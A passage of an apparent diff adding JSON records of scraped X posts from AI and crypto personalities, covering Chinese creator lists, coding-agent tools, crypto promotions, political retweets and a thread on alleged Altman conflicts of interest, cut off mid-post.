1 的商业化打造,已有项目营收突破七位数。\n\n15. CuiMao @CuiMao 偏重开发实战的 AI 博主,专研深度学习、NVIDIA 生态与 ComfyUI 工作流,并运营着免费的技术学习社群。\n\n这批博主横跨了 AI 编程、比特币生态、SaaS 出海以及深度技术钻研等多个细分赛道,关注他们,往往能捕获到行业最前线的风向。", + "url": "https://x.com/bozhou_ai/status/2049042369530777747", + "published_at": "2026-04-28T08:25:44+00:00", + "source": "nitter" + }, + { + "handle": "chuxiaeth", + "account": "@chuxiaeth", + "name": "初夏", + "title": "《Cursor 官方扶持的 AI & Web3 创作者名录》\n\n@cursor_ai 作为顶尖的 AI 项目,最近筛选了 15 位中文区优质博主,给予了价值一万美元的 Token 激励。如果深入了解这个圈子的行情,就会知道这份名单的分量确实不低。\n\n以下是这 15 位获得资助的创作者及其核心画像(顺序随机):\n\n1. Jason Zhu @GoSailGlobal 独立开发者,主要分享 SaaS 出海经验与 AI 资讯,并搭建了一个聚合各类 Agent 技能的资源站点。\n\n2. 0xAA @0xAA_Science 毕业于北大计算机系,博士学历,同时也是 Web3 开源教育平台 WTF Academy 的发起人。\n\n3. 泊舟 @bozhou_ai 拥有 2.1 万粉丝的 AI 博主,既是 AI 程序员也是氛围编程的践行者,重点构建各类智能体与提示词方案。\n\n初夏 @chuxiaeth 这里斗胆把我也加入,一个努力学习AI的小卡拉米。\n\n4. Ding @dingyi 产品设计师出身,掌管着 SaasPick、TopFeed 等多个独立产品,全网积累了约 15 万的关注者。\n\n5. 雪踏乌云 @Pluvio9yte 供职于大厂的开发者,主要输出氛围编程、AI 编程技巧以及产品出海方面的实操经验。\n\n6. 奶昔 @realNyarime Naixi Networks 的创办者,核心精力聚焦在 eSIM 技术与奶昔社区的运营上。\n\n7. 杀破狼 @wolfyxbt 深耕 Meme 币赛道,热衷于氛围编程与链上数据拆解,表达方式风趣且一针见血。\n\n8. 凡人小北 @frxiaobei 身兼商业与战略顾问,致力于 AI 战略咨询,长期扎根在真实商业场景中推动 AIGC 项目的落地应用。\n\n9. Leo @runes_leo AI 与 Crypto 的独立建设者,符文堂社区的发起人,深入钻研比特币生态体系与链上量化策略。\n\n10. 铁锤人 @lxfater AI 领域博主,善于借助 AI 赋能创业历程,在 GitHub 上维护着一个斩获 3 万星标的热门项目。\n\n11. 比特币橙子 @oranges 资深比特币玩家与加密投资人,对 AI 和氛围编程抱有极高热情,亲手搭建了集成多种 AI 智能体的工具集 OwlClawHub。\n\n12. Steven Lynn @Stv_Lynn 既是科技播客 FirstLabAI 的主持人,也是线下活动 Crazy Saturday 的发起与主办者。\n\n13. Berryxia @berryxia 热衷于打造各类 AI 工具并精研系统级提示词,对设计美学与提示词分享抱有极大热忱。\n\n14. 余温 @gkxspace 05 年出生的连续创业者,年纪虽轻但经验丰富,专注于 AI 产品从 0 到 1 的商业化打造,已有项目营收突破七位数。\n\n15. CuiMao @CuiMao 偏重开发实战的 AI 博主,专研深度学习、NVIDIA 生态与 ComfyUI 工作流,并运营着免费的技术学习社群。\n\n这批博主横跨了 AI 编程、比特币生态、SaaS 出海以及深度技术钻研等多个细分赛道,关注他们,往往能捕获到行业最前线的风向。", + "url": "https://x.com/chuxiaeth/status/2049042369530777747", + "published_at": "2026-04-28T08:25:44+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "memos确实是在记忆里面做的很不错的,自己做的Agent也可以接入一下他们的", + "url": "https://x.com/bozhou_ai/status/2049033808629129504", + "published_at": "2026-04-28T07:51:43+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "说得太对了👍,牛逼", + "url": "https://x.com/lxfater/status/2049026986442707117", + "published_at": "2026-04-28T07:24:37+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "x.com/i/article/204902020458…", + "url": "https://x.com/bozhou_ai/status/2049021892208521544", + "published_at": "2026-04-28T07:04:22+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "x.com/i/article/204837140806…", + "url": "https://x.com/lxfater/status/2049019768456241273", + "published_at": "2026-04-28T06:55:56+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "R to @lxfater: 来源:\n\n[1]https://www.businesstoday.in/technology/story/sam-altmans-outside-bets-raise-fresh-conflict-questions-as-openai-nears-ipo-526161-2026-04-17\n[2] https://thenextweb.com/news/openai-is-in-talks-to-buy-fusion-energy-from-helion\n[3] https://www.cnbc.com/2026/02/25/thrive-capital-openai-joshua-kushner.html\n[4] https://slguardian.org/conflict-of-interest-storm-engulfs-openai-as-sam-altmans-private-deals-face-scrutiny/\n[5] https://techcentral.co.za/greg-brockmans-diary-takes-centre-stage-in-musk-vs-openai/280684/\n[6] https://x.com/elonmusk/status/2048801964457140540(Musk 原推:「Scam got dozens of OpenAI side deals with a piece of the action for himself, Y Combinator style」)", + "url": "https://x.com/lxfater/status/2049009528595685705", + "published_at": "2026-04-28T06:15:15+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "Sam Altman 最聪明的地方,不是把 AI 做起来,是这套给自己捞钱的手法\n\n2015 年,OpenAI 打着非营利的旗号成立\n顶级研究员冲着使命感来,不要钱只要理想\nMusk 看到了,砸了 3800 万进去\n监管也没把它当商业公司盯\n\n连 Musk 这种人都信了\n\n但 CEO 在想另一件事\n\nAltman 从 2014 年开始,在核聚变公司 Helion 买了股\n2021 年一口气砸进去 3.75 亿美元,这是他个人最大的一笔押注 [1]\n\n然后他提议,让 OpenAI 向 Helion 投 5 亿美元\n这 5 亿进去,Helion 估值直接涨 6 倍,他自己的股份跟着涨 [1]\n\nOpenAI 内部的人看出问题了\n员工觉得 Helion 的技术根本没到那个阶段,而且 CEO 这么做,明摆着是用公司的钱给自己的投资抬价\n董事会拒绝了 [1]\n\n看起来,这件事到这里结束了\n\n但 Altman 还有一招\n\n他让 OpenAI 跟 Helion 签了一份购电协议\n2035 年前买 Helion 的 50 吉瓦电力\n就是说,OpenAI 承诺未来要用 Helion 的电\n那些电,现在还没发出来 [2]\n\nHelion 拿着这份协议去融资,融到了 2.5 亿美元,估值 150 亿\n领投的 Thrive Capital 跟 Altman 关系很深,同时也是 OpenAI 的投资人,往里投了超过 10 亿美元 [3]\n\n股权投资被拒了\n他换了个形式,把同样的事做完了\n\nMusk 把这套操作叫做 Y Combinator 风格 [6]\n就是 YC 那套圈内玩法:互相投资、互相背书,写进合同结构里,外人看全是正常生意\n\nAltman 就是从 YC 出来的\n\nMusk 说,Altman 用这套方式给自己安排了几十笔交易\n(这是 Musk 的指控,庭审还在进行,法庭没有裁定)[6]\n\n但 2023 年 11 月,董事会把 Altman 踢走的时候说的是:\n\n他投了什么公司,我们根本不知道 [4]\n\n不是没想查,是这个结构本来就看不出来\n非营利机构没有上市公司那套强制披露,CEO 替 OpenAI 谈的每笔交易,到底是为公司还是为自己,没人能判断\n\n今天,Musk 的庭审正式开始\nBrockman 的日记、Helion 这条线、整套结构,第一次摆到台面上 [5]\n\nMusk 能不能赢不好说\n\n但那套结构,还在别的地方跑着", + "url": "https://x.com/lxfater/status/2049009402372313341", + "published_at": "2026-04-28T06:14:44+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "青椒肉丝饭 + 老盐百香果 6u", + "url": "https://x.com/0xAA_Science/status/2049000780519321906", + "published_at": "2026-04-28T05:40:29+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "Claude Code 最近放飞得厉害,“Let 我”是哪国语言,是被 chinglish 污染了吧。", + "url": "https://x.com/frxiaobei/status/2048991998275965022", + "published_at": "2026-04-28T05:05:35+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "快连被墙干服了,关停了中国大陆的服务。\n\n我没用过快联,不过这几天群里都是说快连用不了的,感觉用户很多。\n有什么好的 vpn 推荐吗?我其实觉得买个海外服务器,让 AI 帮你自建一个 VPN 更靠谱。", + "url": "https://x.com/0xAA_Science/status/2048973617854328890", + "published_at": "2026-04-28T03:52:33+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: The EPA's independent science arm did groundbreaking research to save lives. It studied fertility, asthma, wildfires, drinking water, climate change etc etc\n\nIn just one year, it has been almost completely dismantled\n\nOf 1500 scientists, only 124 remain\n\nhttps://www.nytimes.com/2026/04/27/climate/epa-science-trump-cuts.html?unlocked_article_code=1.eVA.yCwJ.TYSUUslTTFoa&smid=tw-share", + "url": "https://x.com/ylecun/status/2048931628995510596", + "published_at": "2026-04-28T01:05:42+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "我也是强烈推荐5.5,现在我写文章,写代码都是用5.5,比4.7好用很多", + "url": "https://x.com/bozhou_ai/status/2048921844175212590", + "published_at": "2026-04-28T00:26:49+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: “Calling Trump a fascist incites political violence”\n\nHere’s a compilation of Trump calling his opponents fascists", + "url": "https://x.com/ylecun/status/2048879552022130882", + "published_at": "2026-04-27T21:38:46+00:00", + "source": "nitter" + }, + { + "handle": "karpathy", + "account": "@karpathy", + "name": "Andrej Karpathy", + "title": "RT by @karpathy: New work with @AlecRad and @DavidDuvenaud:\n\nHave you ever dreamed of talking to someone from the past? Introducing talkie, a 13B model trained only on pre-1931 text. \n\nVintage models should help us to understand how LMs generalize (e.g., can we teach talkie to code?). Thread:", + "url": "https://x.com/karpathy/status/2048878495539843211", + "published_at": "2026-04-27T21:34:34+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: He is right", + "url": "https://x.com/ylecun/status/2048871429681148028", + "published_at": "2026-04-27T21:06:29+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "Mon afternoon song 2 (remix much better then original)\n\nhttps://www.youtube.com/watch?v=fLdTlfK_5KQ&list=RDGMEMWO-g6DgCWEqKlDtKbJA1Gw&start_radio=1&rv=dvQJIgjlR3I", + "url": "https://x.com/eladgil/status/2048865167233200586", + "published_at": "2026-04-27T20:41:36+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "Mon afternoon song\nhttps://www.youtube.com/watch?v=dvQJIgjlR3I", + "url": "https://x.com/eladgil/status/2048863662396658146", + "published_at": "2026-04-27T20:35:37+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "Cole Allen didn’t need to go down a fringe rabbit hole to become radicalized. He just needed to believe the MSM’s inflammatory rhetoric, lies, and hoaxes about Trump.", + "url": "https://x.com/DavidSacks/status/2048821257534111863", + "published_at": "2026-04-27T17:47:07+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "R to @DavidSacks: x.com/a16z/status/1985413352…", + "url": "https://x.com/DavidSacks/status/2048813533136060459", + "published_at": "2026-04-27T17:16:26+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "R to @DavidSacks: The problem with most of the “AI Safety” crowd is that their solutions always favor more government centralization and control. In other words, they will bring about the Orwellian future they claim to oppose. From last year:\n https://x.com/a16z/status/1985413352349413542/video/1?s=48", + "url": "https://x.com/DavidSacks/status/2048813311668486300", + "published_at": "2026-04-27T17:15:33+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "Concerning. As I’ve said many times before, the biggest risk of AI isn’t James Cameron’s The Terminator, it’s George Orwell’s 1984.", + "url": "https://x.com/DavidSacks/status/2048811495224390105", + "published_at": "2026-04-27T17:08:20+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "RT by @frxiaobei: A completely local agent that lives right inside your browser.\n\nPowered by Gemma 4 E2B and WebGPU, it uses native tool calling to:\n\n🔍 Search browsing history\n📄 Read and summarize pages\n🔗 Manage tabs\n\n100% local. No servers needed!", + "url": "https://x.com/frxiaobei/status/2048805789788413984", + "published_at": "2026-04-27T16:45:39+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "Amazing", + "url": "https://x.com/frxiaobei/status/2048805385537306677", + "published_at": "2026-04-27T16:44:03+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "RT by @eladgil: \"Every society at it's apex ultimately has built large public art to inspire the next generation\" @eladgil", + "url": "https://x.com/eladgil/status/2048803386938495412", + "published_at": "2026-04-27T16:36:07+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "OpenClaw 4.1x 后对于 GPT 的支持上了一个大台阶,之前只说不干的毛病基本没了。\n\n但是我修改了点 soul 文件里的内容后,他现在讲话总“卧槽”是怎么回事儿。\n\n像极了刚走向社会的二愣子。", + "url": "https://x.com/frxiaobei/status/2048802517237350599", + "published_at": "2026-04-27T16:32:39+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "OpenClaw 这么频繁的发版,我一开始以为他们掌握了什么自动化测试的黑科技,直到我最近做了两次升级。\n😤\n虽然 AI 时代讲究一个快,但好歹咱尊重下测试环节。", + "url": "https://x.com/frxiaobei/status/2048800504206282887", + "published_at": "2026-04-27T16:24:39+00:00", + "source": "nitter" + }, + { + "handle": "AndrewYNg", + "account": "@AndrewYNg", + "name": "Andrew Ng", + "title": "AI-native software engineering teams operate very differently than traditional teams. The obvious difference is that AI-native teams use coding agents to build products much faster, but this leads to many other changes in how we operate. For example, some great engineers now play broader roles than just writing code. They are partly product managers, designers, sometimes marketers. Further, small teams who work in the same office, where they can communicate face-to-face, can move incredibly quickly.\n\nBecause we can now build fast, a greater fraction of time must be spent deciding what to build. To deal with this project-management bottleneck, some teams are pushing engineer:product manager (PM) some teams are pushing engineer:product manager (PM) ratios downward from, say, 8:1 to as low as 1:1. But we can do even better: If we have one PM who decides what to build and one engineer who builds it, the communication between them becomes a bottleneck. This is why the fastest-moving teams I see tend to have engineers who know how to do some product work (and, optionally, some PMs who know how to do some engineering work). When an engineer understands users and can make decisions on what to build and build it directly, they can execute incredibly quickly.\n\nI’ve seen engineers successfully expand their roles to including making product decisions, and PMs expand their roles to building software. The tech industry has more engineers than PMs, but both are promising paths. If you are an engineer, you’ll find it useful to learn some product management skills, and if you’re a PM, please learn to build!\n\nLooking beyond the product-management bottleneck, I also see bottlenecks in design, marketing, legal compliance, and much more. When we speed up coding 10x or 100x, everything else becomes slow in comparison. For example, some of my teams have built great features so quickly that the marketing organization was left scrambling to figure out how to communicate them to users — a marketing bottleneck. Or when a team can build software in a day that the legal department needs a week to review, that’s a legal compliance bottleneck. In this way, agentic coding isn’t just changing the workflow of software engineering, it’s also changing all the teams around it.\n\nWhen smaller, AI-enabled teams can get more done, generalists excel. Traditional companies need to pull together people from many specialties — engineering, product management, design, marketing, legal, etc. — to execute projects and create value. This has resulted in large teams of specialists who work together. But if a team of 2 persons is to get work done that require 5 different specialities, then some of those individuals must play roles outside a single speciality. In some small teams, individuals do have deep specializations. For example, one might be a great engineer and another a great PM. But they also understand the other key functions needed to move a project forward, and can jump into thinking through other kinds of problems as needed. Of course, proficiency with AI tools is a big help, since it helps us to think through problems that involve different roles.\n\nEven in a two-person team, to move fast, communication bottlenecks also must be minimized. This is why I value teams that work in the same location. Remote teams can perform well too, but the highest speed is achieved by having everyone in the room, able to communicate instantaneously to solve problems.\n\nThis post focuses on AI-native teams with around 2-10 persons, but not everything can be done by a small team. I'll address the coordination of larger teams in the future.\n\nI realize these shifts to job roles are tough to navigate for many people. At the same time, I am encouraged that individuals and small teams who are willing to learn the relevant skills are now able to get far more done than was possible before. This is the golden age of learning and building!\n\n[Original text: https://www.deeplearning.ai/the-batch/issue-349/ ]", + "url": "https://x.com/AndrewYNg/status/2048793852702757151", + "published_at": "2026-04-27T15:58:13+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: By canning the National Science Board with no stated justification, the administration continues the destruction of this country's scientific and technological base built up over 80 years. Supporters of this action live in a fantasy dystopia about how science operates.", + "url": "https://x.com/ylecun/status/2048779086168838610", + "published_at": "2026-04-27T14:59:33+00:00", + "source": "nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "title": "最近想玩链游的可以看看 @RealGoOfficial 这个游戏\n\n他们刚刚拿到了 350w 美金融资,这个行情能融到这个数字算很不错了。苹果商店和谷歌商店现在都可以下载,玩法类似 Pokemon GO,出门走路到现实世界抓 Meme 宠物,然后收集、升级、融合、组队、社交。\n\n他们提出 Meme 3.0 的概念,想去做一些 Meme 相关的生态基建,现在和几个 Meme 的大 IP 都有合作,比如 Doge、Floki、Toshi 和 WIF 等等,之前和 @xhunt_ai 也有过合作。\n\n大概今年 Q2 会 TGE,有时间可以玩一玩,可以参加一下他们的忠诚度计划,玩游戏或交互都可以撸积分和代币。", + "url": "https://x.com/wolfyxbt/status/2048764088193569049", + "published_at": "2026-04-27T13:59:57+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "The video of my conversation with Amin Vahdat, @gilbert, and @djrosent at Cloud Next last week is now up. \n\nhttps://youtu.be/BpnJYJmbXcM?si=vUY3hI_aDX8K6gco\n\nThanks for a great conversation!", + "url": "https://x.com/JeffDean/status/2048759102390899142", + "published_at": "2026-04-27T13:40:08+00:00", + "source": "nitter" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "title": "This is kinda interesting.\n\nAnthro probably needs to scale up Account Support via Claude or via humans (traditional account managers). Would be funny if they chose humans.\n\nAlternatively, more and more companies can probably go multi-AI with open harnesses. \n\nSimilar problems to the cloud era enterprise pains. I'm sure these issues would apply to all the other AI providers.\n\nhttps://www.reddit.com/r/ClaudeAI/comments/1sspwz2/psa_anthropic_bans_organizations_without_warning/", + "url": "https://x.com/soumithchintala/status/2048756358820827564", + "published_at": "2026-04-27T13:29:14+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: The 2020 US election was audited on a massive scale. Researchers examined audit results from 856 jurisdictions across 27 states, covering over 71 million votes. The audits found the net error rate in counting presidential votes was 0.007%. The median shift in any county's vote count was zero.", + "url": "https://x.com/ylecun/status/2048740712556933170", + "published_at": "2026-04-27T12:27:04+00:00", + "source": "nitter" + }, + { + "handle": "Stv_Lynn", + "account": "@Stv_Lynn", + "name": "Steven Lynn", + "title": "Image", + "url": "https://x.com/Stv_Lynn/status/2048713165232644251", + "published_at": "2026-04-27T10:37:36+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "Meta 对 Manus 的收购被中国发改委驳回。\n看来以后要么一开始就出海,要么就不出海。", + "url": "https://x.com/0xAA_Science/status/2048685380304871774", + "published_at": "2026-04-27T08:47:12+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "RT by @0xAA_Science: 用 @gmgnai 的 skill (获取链上数据) + @xapi_to xapi skill(社交搜索)组合玩玩,做了个异动的meme(异动的老币+新币+多链异动同名币+持续上升币),担心再次错过太空狗等信号~ 有 ai 真方便啊~", + "url": "https://x.com/0xAA_Science/status/2048666088733581805", + "published_at": "2026-04-27T07:30:32+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "我以前也会AI焦虑,我现在做的事情,AI以后一定都能做,甚至比我好\n\n现在我觉得,想那么多干嘛,我先用起来,玩起来,Token烧起来,做到是身边圈子里面AI用的做好的一批人就好了", + "url": "https://x.com/bozhou_ai/status/2048663377598452202", + "published_at": "2026-04-27T07:19:46+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "RT by @bozhou_ai: 中文AI必关注12位高价值博主\n\nAI内容每天都在刷屏,但真正能帮你提效、避坑、落地的其实没几个。\n\n我挑了12位持续输出干货、实战经验丰富的中文博主,覆盖工具测评、Agent搭建、出海变现、Prompt工程、创意落地等方向,建议直接关注。\n\n1. 摸鱼巨匠 @SunNeverSetsX\nAI+Web3趋势观察者,擅长把前沿资讯浓缩成可落地的认知框架,宏观视野极强\n\n2. Rachel @Zesee\n前微软亚马逊产品人,现在深耕AI营销创业,分享产品开发实操和行业洞察,干货密度高\n\n3. 小将 @nftbanker\n欧洲GenAI大会主办方 + 最大华人AI出海社区创始人,副业创业和落地案例特别实在\n\n4. WaytoAGI @WaytoAGI\n中文AI知识库整理专家,像随身AI百科一样持续更新一手资讯和实战总结\n\n5. 汗青 HQ @hq4ai\n\nAI创意与AIGC艺术应用先锋,专注虚拟偶像、AI-IP创作和短视频灵感,技术与艺术结合得非常出色\n\n6. Mulight 沐光 @0xMulight\n专注AI工具深度测评 + 手机端高效工作流(Hermes WebUI等),自动化提效方案直接能用,实用党福音\n\n7. 阿西_出海 @axichuhai\nAI+LLM+Agent副业实战派,分享自媒体变现路径和真实落地打法\n\n8. 泊舟 @bozhou_ai\nVibe编码与Agent构建高手,系统Prompt和高效工作流拆解非常清晰\n\n9. berryxia @berryxia\nPrompt工程与AI工具设计专家,设计+编码+提示词三合一输出,质量顶尖\n\n10. CuiMao @CuiMao\n纯干货AI开发者,不接广告,专注深度学习实战分享\n\n11. GoSailGlobal @GoSailGlobal\n独立SaaS出海玩家,AI产品价值提炼和真实创业经验分享很接地气\n\n12. 范凯说 AI @fankaishuoai\nAI时代个人转型实战导师,提供可直接执行的框架和落地方法论", + "url": "https://x.com/bozhou_ai/status/2048640580004335669", + "published_at": "2026-04-27T05:49:10+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "狗B们在组团在 bags 分流太空狗,好恶心啊。\n下次它们买什么,咱们就去找个新盘子分,好吗?", + "url": "https://x.com/0xAA_Science/status/2048610365324623966", + "published_at": "2026-04-27T03:49:07+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "之前花了不少时间折腾 OpenClaw,想让 AI 在手机上也能帮我干活。结果发现 Token 消耗特别大,效果也没想象中好。后来一直是用 Claude Code写好 Skills 然后给到它来执行。\n\n一直缺的就是一个远程控制的入口。今天发现了 cc-connect 这个开源项目,刚好补上这块。\n\n它做的事很简单:把 AI 编码助手桥接到聊天软件里。支持的面很广:\n\nAI 端:Claude Code、Codex、Cursor、Gemini CLI、Kimi CLI 等 10 多种\n聊天端:飞书、钉钉、Telegram、Slack、Discord、企业微信、QQ 等 11 个平台\n\n功能也挺全:\n1. 不需要公网 IP,大部分平台直接连\n2. 支持语音、图片、文件发送\n3. 多项目同时跑,一个进程搞定\n4. 会话管理,能创建、切换、看历史\n5. 斜杠命令控制模型切换、权限、工作目录\n6. 定时任务,用自然语言就能设\n7. 带 Web 管理界面,配置不用碰命令行\n8. 支持不同用户隔离运行,安全性有保障\n\n简单说就是:出门在外,手机上打开飞书或 Telegram 就能让 Claude Code 继续干活。\n\nhttp://github.com/chenhg5/cc-connect", + "url": "https://x.com/bozhou_ai/status/2048603768250585231", + "published_at": "2026-04-27T03:22:54+00:00", + "source": "nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "title": "不要骂我了,山寨季已经来过了\n\n$TRUMP 发币前后就是山寨季,就是本轮牛市山寨币流动性最充沛的时间段。\n\n觉得没来的,大部分是自己没赚到钱,我觉得要反省一下,不反省的话,下一轮山寨季也大概率賺不到钱。\n\n山寨币是赚钱容易而已,不是所有人都赚钱。", + "url": "https://x.com/wolfyxbt/status/2048581892333867398", + "published_at": "2026-04-27T01:55:58+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "人生第一次录播客,我们和cell老师一起聊聊中转站的那些事", + "url": "https://x.com/bozhou_ai/status/2048571760698949641", + "published_at": "2026-04-27T01:15:43+00:00", + "source": "nitter" + }, + { + "handle": "chuxiaeth", + "account": "@chuxiaeth", + "name": "初夏", + "title": "- @RiverdotInc 第五季创作者排名战正式打响🏆 \n赛季时间:4月22日 → 26年Q2结束📅 \n这一季的主题就是 RIVER 质押 + 合作活动,我也会继续在现场肝建设🛠️ \n另外,第四季空投会在结算完成后开放领取🪂,别忘了蹲 \n@River4fun 💧\n\n我也已经加入到第五季的战斗", + "url": "https://x.com/chuxiaeth/status/2048547844982976544", + "published_at": "2026-04-26T23:40:41+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: 👉 Sur l’#IA, mon optimisme est prudent. Je reconnais les dangers de cette technologie, mais si on en freinait le développement en Europe, au nom du principe de précaution, son essor aurait lieu ailleurs. Il faut l'exploiter au mieux.\n\n👇 Discussion dans Le Monde", + "url": "https://x.com/ylecun/status/2048547683112046771", + "published_at": "2026-04-26T23:40:02+00:00", + "source": "nitter" + }, + { + "handle": "chuxiaeth", + "account": "@chuxiaeth", + "name": "初夏", + "title": "- @ferra_protocol 居然也上贵金属永续合约了🥇 \n现在是个项目都在往链上合约赛道挤🔗,蛋糕基本被分干净了 \n\n如果你是 SUI 链老玩家,又对贵金属合约有执念,可以多蹲蹲 #Ferra,这也是我捂了很久一直在撸的项目💰 \n\n交互链接: https://ferra.ag?code=tBYQfU0aq\n\n进去直接点 Perpetuals 就能开搞⚡️ #DEXonSui 🚀", + "url": "https://x.com/chuxiaeth/status/2048545974747070599", + "published_at": "2026-04-26T23:33:15+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "MSM hoax factories like the Atlantic love to allege conflicts of interest without ever disclosing their own.", + "url": "https://x.com/DavidSacks/status/2048502978626113625", + "published_at": "2026-04-26T20:42:24+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "RT by @frxiaobei: Yes, Obsidian Reader works for X articles and threads using the browser extension.\n\nWe're also making improvements to the share sheet in Obsidian 1.13 so you'll be able to save more easily directly within the X app.", + "url": "https://x.com/frxiaobei/status/2048487623250063516", + "published_at": "2026-04-26T19:41:23+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Trump has spent the better years of his second term treating allied governments like freeloading tenants who should be grateful he hasn’t changed the locks. \n\nThe result, predictably, is that they’ve stopped waiting for the lease to expire and started buying their own buildings.\nWhat’s happening now is qualitatively different from the grumbling of 2017-2019. Back then, European leaders still believed the relationship was cyclical – that America would eventually sober up and the old architecture would reassemble itself. \n\nThat belief is gone. Greenland changed everything. For ever. What replaced it are structural decisions: \n\nGerman rearmament on a scale not seen since before reunification, French-led European defence coordination that pointedly excludes Washington, South Korean quiet conversations about indigenous nuclear deterrence, Japanese defence spending hitting levels that would have been politically unthinkable five years ago.\n\nThe crucial dynamic is that these shifts generate their own momentum. A German arms industry rebuilt to supply a European force doesn’t get mothballed when the next US president calls. A generation of European defence planners trained to operate without American command integration doesn’t unlearn that. Trade relationships rerouted through new corridors don’t spontaneously return to their old paths just because someone in Washington eventually extends an olive branch.\n\nTrump appears to have understood American power as a static asset – something you could spend down for short-term leverage without diminishing the underlying account. \n\nWhat his allies understood, and what he didn’t, is that the asset was always relational. The moment they stopped believing in it, the balance sheet changed permanently.\nThe irony is almost classical. He wanted to make America’s allies pay more for American protection. Instead, he convinced them to stop needing it.", + "url": "https://x.com/ylecun/status/2048482084646240560", + "published_at": "2026-04-26T19:19:22+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: Accurate", + "url": "https://x.com/DavidSacks/status/2048456433981591867", + "published_at": "2026-04-26T17:37:26+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: What if I told you there was a technology where 1.5 million people would die every year and injure 50 million would you sign up for that tech? \n\nHell no, right? \n\nBut the answer is actually \"hell yes\" because it's cars. \n\nYou probably got in one today and never even thought it could kill you. You normalized the risk so easily.\n\nIn contrast, the amount of people who died or were injured by AI is a tiny fraction of a percent and even those cases are probably specious at best.\n\nIn fact, AI has actually saved countless lives. \n\nIt's saved lives through drug discovery by helping create the COVID and flu vaccines. It's saved lives through anti-lock breaks. It's saved lives with self driving cars that are 10X safer than human drivers and yet the only thing you read about self driving cars in the news are the incredibly rare stories of the very few times it did actually kill a dog or injure someone.\n\nIf that sounds irrational and insane that's because it is.\n\nWe're worried about a technology with a nearly perfect track record of safety and 